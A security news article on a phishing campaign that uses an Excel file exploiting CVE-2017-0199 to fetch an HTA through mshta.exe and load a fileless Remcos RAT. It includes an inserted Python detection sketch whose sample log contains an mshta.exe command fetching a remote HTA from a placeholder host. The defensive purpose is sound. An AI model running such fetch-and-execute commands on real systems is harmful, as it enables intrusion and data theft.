- A new phishing campaign was recently detected that distributed an Excel file
- The file places a fileless version of Remcos RAT on the device
- Remcos can steal sensitive files, registry keys and more
Hackers have been seen distributing a fileless version of the Remcos Remote Access Trojan (RAT), which they then use to steal sensitive information from target devices using hijacked spreadsheet software.
In a technical analysis, Fortinet researchers said they observed threat actors sending phishing emails with the familiar purchase-order subject line. Attached to the email is a Microsoft Excel file crafted to exploit a remote code execution vulnerability in Office (CVE-2017-0199). When triggered, the file downloads an HTML Application (HTA) file from a remote server and launches it via mshta.exe.
The downloaded file pulls a second payload from the same server, which performs the initial anti-analysis and anti-debugging checks and then downloads and runs Remcos RAT.
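A defender-side view of the chain described above: the telling signal is an Office process launching mshta.exe, especially with a remote URL on its command line. This is an added detection sketch, not Fortinet's code; the pipe-separated log format, field names and sample records are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Office hosts that have no legitimate reason to launch the HTA host directly.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str

def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed, pipe-separated process-creation record."""
    parent, image, cmd = line.split("|", 2)
    return ProcessEvent(parent.strip(), image.strip(), cmd.strip())

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcessEvent) -> Optional[str]:
    """Return a severity label for Office -> mshta.exe chains, else None."""
    if basename(ev.parent_image) not in OFFICE_PARENTS:
        return None
    if basename(ev.image) != "mshta.exe":
        return None
    if REMOTE_URL.search(ev.command_line):
        return "high"    # HTA fetched from a remote server, as in this campaign
    return "medium"      # local HTA from Office is unusual but less conclusive

# Constructed sample events (not real telemetry): parent | image | command line
SAMPLE_LOG = [
    r"C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|EXCEL.EXE PO-4471.xlsx",
    r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|C:\Windows\System32\mshta.exe|mshta.exe http://example.invalid/stage1.hta",
    r"C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe C:\Users\a\Desktop\tool.hta",
    r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\mshta.exe|mshta.exe C:\Temp\x.hta",
]

def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (record index, severity) for every event that matches."""
    hits = []
    for i, line in enumerate(lines):
        sev = classify(parse_event(line))
        if sev:
            hits.append((i, sev))
    return hits

if __name__ == "__main__":
    for idx, sev in scan(SAMPLE_LOG):
        print(f"record {idx}: {sev}: {SAMPLE_LOG[idx]}")
```

The rule only covers the first hop; the second-stage download runs inside mshta.exe itself, so network telemetry from that process is needed to see it.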
Remcos returns
For its part, Remcos was not always considered malware. It was created as legitimate commercial software, used for remote administration tasks. However, it was hijacked by cybercriminals, in the same way that Cobalt Strike was hijacked, and today it is mainly used for unauthorized access, data theft, and espionage. Remcos can log keystrokes, take screenshots and execute commands on infected systems.
But this version of Remcos is placed directly into the device's memory: “Instead of saving the Remcos file to a local file and running it, it deploys Remcos directly into the memory of the current process,” Fortinet explained. “In other words, it is a fileless variant of Remcos.”
Email phishing remains one of the most popular ways cybercriminals infect devices with malware and steal sensitive information. It is cheap to run and works well, which makes it a very efficient attack vector. The best defense against phishing is to read emails with a critical eye and to be very careful before downloading and executing attachments.